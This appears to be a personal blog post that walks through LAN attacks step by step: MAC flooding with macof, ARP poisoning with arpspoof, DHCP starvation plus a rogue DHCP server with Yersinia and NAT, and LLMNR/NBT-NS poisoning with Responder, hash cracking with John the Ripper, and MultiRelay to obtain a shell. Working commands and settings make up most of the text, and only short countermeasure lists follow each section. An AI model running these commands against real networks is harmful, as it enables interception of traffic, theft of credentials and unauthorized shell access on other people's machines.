1) MAC Flooding
Currently, most switches each can store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches each can store a great quantity of MAC addresses.
Countermeasure:
- Port Security to limit the number of PCs connecting to each port
- IEEE 802.1x requiring connected PCs to forcibly authenticate their identities
- MAC Filtering only allowing authorized MAC addresses to communicate
2) ARP Poinsoning
In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then leverage WireShark to capture the confidential information.
More details can refer to the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html
Countermeasure:
- Encryption In Transit and At Rest to withstand Man In The Middle and Interception
- Applying Static ARP to networks
- Leverage such integration solutions as CISCO DHCP Snooping and Dynamic ARP Inspection
3) DHCP Spoofing
Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Leverage the following steps to launch DHCP Starvation attack in order to exhaust the authorized DHCP server:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing the ENTER button to launch DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget turning off the firewall if any.
Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-alike systems to monitor DHCP Starvation attack
4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)
Scenario #1:
When someone in the same WINDOWS domain makes a typo with an nonexistent hostname, the following command will capture the request, and respond with a fake response in order to gain the one's username and the hash of the one's password.
[Attacker Kali PC:]
# responder -I eth0
After gaining the username and hash:
# cd /usr/share/responder/logs
Apply john the ripper to the case as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt
Scenario #2:
If those PCs sitting in the WINDOWS network enable WPAD configuring proxy settings, the WPAD listener could be enabled to trick PCs' owners into typing their passwords, the attacker then can get the passwords without decrypting anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb
Scenario #3:
The Multi-Relay function of Responder could be applied when SMB Signing settings on the victim's PC is disabled.
[Attacker Kali PC:]
First determine if SMB Signing settings on the victim is disabled:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit responder.conf and turn off SMB and HTTP services:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 –u ALL
Countermeasure:
- Enable SMB Signing
No comments:
Post a Comment